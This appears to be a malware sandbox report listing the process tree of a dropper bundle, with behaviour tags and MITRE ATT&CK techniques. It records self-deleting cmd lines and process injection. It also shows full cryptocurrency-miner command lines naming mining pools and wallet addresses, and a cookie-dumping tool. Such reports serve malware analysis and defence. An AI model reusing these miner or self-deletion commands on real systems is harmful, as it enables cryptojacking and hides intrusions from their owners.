C:\Users\Admin\AppData\Local\Temp\b1te3sghhjh\hjtdaeqwtkr.exe"C:\Users\Admin\AppData\Local\Temp\b1te3sghhjh\hjtdaeqwtkr.exe"8⤵
- Executes dropped EXE
PID:6072 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\b1te3sghhjh\hjtdaeqwtkr.exe"9⤵PID:5396
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0t3ydgzvxpe\app.exe"C:\Users\Admin\AppData\Local\Temp\0t3ydgzvxpe\app.exe" /8-238⤵
- Executes dropped EXE
PID:6136 -
C:\Users\Admin\AppData\Local\Temp\0t3ydgzvxpe\app.exe"C:\Users\Admin\AppData\Local\Temp\0t3ydgzvxpe\app.exe" /8-239⤵PID:13644
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JL56KCOEXH\setups.exe"C:\Users\Admin\AppData\Local\Temp\JL56KCOEXH\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Users\Admin\AppData\Local\Temp\is-JU5SC.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-JU5SC.tmp\setups.tmp" /SL5="$40156,635399,250368,C:\Users\Admin\AppData\Local\Temp\JL56KCOEXH\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
PID:4648 -
C:\Users\Admin\AppData\Roaming\B471.tmp.exe"C:\Users\Admin\AppData\Roaming\B471.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4872 -
C:\Users\Admin\AppData\Roaming\B471.tmp.exe"C:\Users\Admin\AppData\Roaming\B471.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3692
-
-
-
C:\Users\Admin\AppData\Roaming\B702.tmp.exe"C:\Users\Admin\AppData\Roaming\B702.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4988 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4808
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
-
C:\Users\Admin\AppData\Roaming\B974.tmp.exe"C:\Users\Admin\AppData\Roaming\B974.tmp.exe"5⤵
- Executes dropped EXE
PID:3916 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\B974.tmp.exe6⤵PID:5616
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:1632
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:5116
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5200
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:5860
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5108 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6372
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6632
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4852
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3252
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3560
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4328
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5896
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\ac9958a7bc164dc2991672de8d9134c7 /t 6104 /p 58961⤵PID:2256
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:5328 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6639507CCAADA5A8877A4C1723AD0BDB C2⤵
- Loads dropped DLL
PID:5324
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BE9BD58E9DCCDD234255A4126532ED162⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:6452
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:4876
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:11820
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:10380
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{61b5f023-bf36-094a-84a7-9639bd736533}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:10860
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:11888
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:12084
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:12108
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:11216
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:7476
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:12368
-
C:\Users\Admin\AppData\Local\Temp\920C.exeC:\Users\Admin\AppData\Local\Temp\920C.exe1⤵PID:4420
-
C:\Users\Admin\AppData\Local\Temp\94DC.exeC:\Users\Admin\AppData\Local\Temp\94DC.exe1⤵PID:10096
-
C:\Users\Admin\AppData\Local\Temp\B0A2.exeC:\Users\Admin\AppData\Local\Temp\B0A2.exe1⤵PID:16020
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵PID:12088
-
-
C:\Users\Admin\AppData\Local\Temp\C871.exeC:\Users\Admin\AppData\Local\Temp\C871.exe1⤵PID:8984
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9640
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5272
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:11016
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:14988
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:15292
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9396
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:10320
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1208
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:13428
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
3Install Root Certificate
1Modify Registry
6Web Service
1